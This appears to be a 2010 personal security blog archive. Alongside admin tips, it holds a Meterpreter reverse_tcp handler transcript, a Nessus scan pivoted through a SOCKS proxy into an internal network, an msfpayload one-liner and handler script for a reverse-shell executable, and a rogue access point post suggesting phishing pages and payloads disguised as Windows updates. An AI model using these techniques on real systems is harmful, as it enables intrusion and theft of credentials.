Re-hosting the resolution since it appears Novell's server goes down from time to time when I attempted to re-reference:
Install the Novell eDirectory Administration Utilities as follows.
1. Extract the tar.gz file for the eDirectory installation and locate the directory /eDirectory/setup.
2. Type ./nds-install from the setup directory.
3. Select option 2 to install the Novell eDirectory Administration utilities.
4. Edit the /etc/ld.so.conf file and make sure the entry /opt/novell/eDirectory/lib is in the file. If not, add the path there and save the file.
5. Type "ldconfig" and press Enter.
If the following error is received after following the steps listed above, reboot the server:
"ice: error while loading shared libraries: libldapsdk.so.0: cannot open shared object file: No such file or directory"
Wednesday, November 10, 2010
Rogue Access Point
Rogue AP using GTWPA from Dean Liu on Vimeo.
The GTWPA project is a wrapper around airbase-ng and dnsspoof. It redirects HTTP traffic to your malicious web server when the victim attempts to browse.
See project here:
crack-wifi.com/forum/viewtopic.php?id=363
I modified the code base such that it enables the attacking machine as a web proxy after credentials are submitted.
You can serve up any login page you want. Here are some ideas: ask for credit card, Facebook login, serve up Metasploit payloads as Windows updates, etc.
Tuesday, November 9, 2010
Google Hacking Database
http://www.exploit-db.com/google-dorks/
Recently resurrected by exploit-db.
A repository of queries that may disclose sensitive information, which may lead to compromise.
Thursday, October 28, 2010
pam_appl.h and pam_modules.h "No such file or Directory"
If you're creating custom PAM modules, you will need these two headers to compile your source code.
These header files are in the "pam-devel" package.
In SUSE - SLED/SLES use: 'yast -i pam-devel' to install the appropriate packages.
Monday, October 25, 2010
Scanning through SOCKS + Meterpreter
Source: http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
192.168.0.2 - The attacking machine
10.1.1.5 - The compromised machine
10.1.1.2 - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.
robin@attacker metasploit $ ./msfconsole
___________
< DigiNinja >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10774 updated today (2010.10.21)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100
msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy...
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 127.0.0.1 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module, then connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List
ID Name Comments
-- ---- --------
4 Minimal MS
3 noping
2 Web
1 All
msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started. uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
[*] You can:
[+] Import Nessus report to database : nessus_report_get
[+] Pause a nessus scan : nessus_scan_pause
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
When it finally finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf auxiliary(socks4a) > nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2 Done!
[+] Done
msf auxiliary(socks4a) > db_hosts
Hosts
=====
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
10.1.1.2 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.
Wednesday, October 20, 2010
psexec logon failure and access denied
If you're experiencing logon failures with your lab testing in psexec (be it the standalone psexec tool or the auxiliary psexec module found within Metasploit), see the resolution below.
Source: http://antonperez.com/2007/11/28/pstools-access-denied-error/
Here are the settings/steps I checked/took that resolved the issue:
1. ping - was able to ping the machine by hostname. So no problem here.
2. net share - verified the ADMIN$ share was enabled. Again no problem here.
3. Remote Registry service - verified the service was started because the PsTools suite makes use of RPC calls via port 445. Was fine here.
4. Administrator password - verified the Administrator did not have an empty password. Was set here.
5. Test account - created a test account to use for psexec (e.g., psexec \\computer_name notepad.exe -u test -p test). Was available here.
6. Access hidden share – tried to access C$ and found that user name field grayed out. This tipped off the problem – cool!
To fix it, I had to set the "Network Access: Sharing and security model for local accounts" security option to "Classic – local users authenticate as themselves."
Access it via Start > Run > secpol.msc > Local Policies > Security Options
Change "Network Access: Sharing and security model for local accounts" to "Classic - local users authenticate as themselves"
Apparently, updates to Windows XP now set this security option to "Guest only – local users authenticate as Guest", which denies the ability to implicitly or explicitly use a specific user name/password combo.
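As an added example (not from the original post or its source), a PowerShell audit of the setting above across lab hosts: the policy is stored as HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ForceGuest (0 = Classic, 1 = Guest only), and remote hosts are read through the Remote Registry service that step 3 already checks. It assumes the account running it has remote registry read access to the named machines; the host names in the usage line are made up.

```powershell
# Added example: report which hosts map network logons with local accounts to Guest.
# ForceGuest is the registry value behind "Network access: Sharing and security
# model for local accounts" (0 = Classic, 1 = Guest only, absent = not explicitly set).
function Get-LocalAccountSharingModel {
    param([string[]]$ComputerName = @($env:COMPUTERNAME))

    foreach ($computer in $ComputerName) {
        $forceGuest = $null
        $errorText  = $null
        try {
            # Remote reads go over the Remote Registry service (RPC over 445).
            $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $computer)
            $lsa  = $hklm.OpenSubKey('SYSTEM\CurrentControlSet\Control\Lsa')
            $forceGuest = $lsa.GetValue('ForceGuest')   # $null when the value is absent
            $hklm.Close()
        } catch {
            $errorText = $_.Exception.Message
        }

        if ($errorText)                { $model = "unreadable: $errorText" }
        elseif ($null -eq $forceGuest) { $model = 'not explicitly set' }
        elseif ($forceGuest -eq 0)     { $model = 'Classic - local users authenticate as themselves' }
        elseif ($forceGuest -eq 1)     { $model = 'Guest only - local users authenticate as Guest' }
        else                           { $model = "unexpected value $forceGuest" }

        [PSCustomObject]@{
            ComputerName           = $computer
            ForceGuest             = $forceGuest
            Model                  = $model
            # Explicit local-account credentials over the network only work in Classic mode,
            # which is exactly the condition the psexec logon failure above hinges on.
            LocalCredsUsableRemote = ($forceGuest -eq 0)
        }
    }
}

# Usage (constructed host names): Get-LocalAccountSharingModel -ComputerName 'lab-xp01','lab-xp02' | Format-Table -AutoSize
```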
Sunday, August 15, 2010
Windows Associated PID with Port
Unlike Linux's handy netstat -anp, Windows yet again makes the same task harder; it takes two steps:
netstat -ano | findstr :[port] (lists the connection on that port with the owning PID in the last column)
tasklist /svc /FI "PID eq [pid]" (displays the process and the services it hosts for that PID)
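As an added example (not from the original post), a PowerShell function that chains the two steps above: netstat -ano to find the PID owning a local port, then tasklist /svc to name the image and any services hosted in that process. It assumes netstat and tasklist are on the PATH and that the shell is elevated enough to see other users' processes.

```powershell
# Added example: resolve a local port to its owning PID, image name and hosted services.
function Get-PortOwner {
    param([Parameter(Mandatory = $true)][int]$Port)

    # netstat -ano rows look like: Proto  Local Address  Foreign Address  [State]  PID
    # Anchor on the local address column so a matching *foreign* port does not hit.
    $rows = netstat -ano | Where-Object { $_ -match "^\s*(TCP|UDP)\s+\S+:$Port\s" }

    foreach ($row in $rows) {
        $fields = $row.Trim() -split '\s+'
        $owner  = [int]$fields[-1]    # PID is always last; UDP rows have no State column

        # tasklist /svc gives "image  pid  services"; /NH drops the header, blank lines are skipped.
        $info = tasklist /svc /FI "PID eq $owner" /NH |
                Where-Object { $_ -match '\S' } | Select-Object -First 1
        $image = $null; $services = $null
        if ($info -match '^(.+?)\s+(\d+)\s+(.*)$') {
            $image    = $Matches[1]
            $services = $Matches[3].Trim()
        }

        [PSCustomObject]@{
            Protocol     = $fields[0]
            LocalAddress = $fields[1]
            State        = if ($fields[0] -eq 'TCP') { $fields[3] } else { 'n/a' }
            PID          = $owner
            Image        = $image
            Services     = if ($services -eq 'N/A') { $null } else { $services }
        }
    }
}

# Usage: Get-PortOwner -Port 445 | Format-Table -AutoSize
```

On Windows 8 / Server 2012 and later, Get-NetTCPConnection -LocalPort 445 exposes the OwningProcess directly, but the netstat/tasklist route above also works on the older systems this blog is written against.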
Monday, August 9, 2010
Automating Metasploit with Shell Scripting
Created a small shell script to automate the multi/handler in Metasploit. This script works with the msfpayload executable (ex: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8080 X > happy.exe).
#!/bin/bash
# Start a Metasploit multi/handler listening for a reverse_tcp Meterpreter payload.
MSF_PATH="/pentest/exploits/framework3/"
MSFCLI="${MSF_PATH}msfcli"
INTERFACE="eth0"
LPORT="8080"
PAYLOAD="windows/meterpreter/reverse_tcp"
echo "Metasploit multi/handler"
# Pick the IPv4 address of $INTERFACE from net-tools ifconfig output ("inet addr:192.168.1.6 ...").
LHOST=$(ifconfig "$INTERFACE" | grep "inet addr" | cut -d":" -f2 | cut -d" " -f1)
# Bail out rather than start a handler bound to an empty LHOST.
[ -n "$LHOST" ] || { echo "No IPv4 address found on $INTERFACE" >&2; exit 1; }
echo "LHOST=$LHOST"
echo "LPORT=$LPORT"
"$MSFCLI" multi/handler PAYLOAD="$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" E
Thursday, August 5, 2010
Windows net user commands reference
Reference: http://articles.techrepublic.com.com/5100-10878_11-5031577.html
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:"text"—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.